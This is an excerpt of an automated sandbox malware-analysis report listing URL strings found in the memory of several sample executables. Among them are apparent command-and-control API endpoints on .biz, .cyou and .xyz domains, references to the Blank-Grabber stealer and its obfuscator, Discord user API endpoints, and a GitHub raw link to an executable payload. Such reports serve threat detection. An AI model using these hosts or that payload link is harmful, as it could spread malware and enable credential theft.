                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://awake-weaves.cyou/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                Source: D1UL0FG.exe, 00000006.00000002.2997976129.000001FA2ECF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001351000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: 8ZVMneG.exe, 00000054.00000003.2825503238.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2799816087.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Q6Qn
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=lILQ2m8IgfoI&l=e
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                                Source: 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                                Source: 8ZVMneG.exe, 00000054.00000003.2799816087.0000000001354000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2797991746.0000000001353000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2796598945.0000000001362000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                                Source: 8ZVMneG.exe, 00000054.00000003.2887641486.0000000003BC9000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2888906817.0000000003BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F95ED9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmp, m9sfEU9.exe, 00000051.00000003.2634727930.00000000033CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469283527.000002732616F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000005.00000003.2469091963.0000027326162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                Source: 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/
                                Source: 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/api
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000002.3044924164.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2940333141.0000000001302000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2941333004.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/apiz1
                                Source: 8ZVMneG.exe, 00000054.00000003.2712485974.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deafeninggeh.biz/e
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://diffuculttan.xyz/api
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                                Source: D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D790000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                                Source: D1UL0FG.exe, 00000006.00000002.2990539732.000001FA2D81C000.00000004.00001000.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: 8ZVMneG.exe, 00000054.00000003.2830589493.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829507445.0000000003B89000.00000004.00000800.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2829086313.0000000003B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/api
                                Source: 8ZVMneG.exe, 00000054.00000003.2826664666.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2825806883.0000000001308000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2798581699.0000000001308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://effecterectz.xyz/apijdo
                                Source: D1UL0FG.exe, 00000006.00000002.2996941109.000001FA2E830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-GrabberrV
                                Source: D1UL0FG.exe, 00000006.00000003.2479764407.000001FA2E279000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479979296.000001FA2E83D000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480587995.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479451301.000001FA2E348000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2479664796.000001FA2E254000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2481335811.000001FA2E26A000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2480317541.000001FA2E251000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                Source: powershell.exe, 00000037.00000002.2645286273.0000021F947A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: D1UL0FG.exe, 00000006.00000002.2989919313.000001FA2BF31000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473137988.000001FA2BFD8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2473163924.000001FA2BF7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                                Source: skotes.exe, 00000003.00000003.5971400666.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.00000000013E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
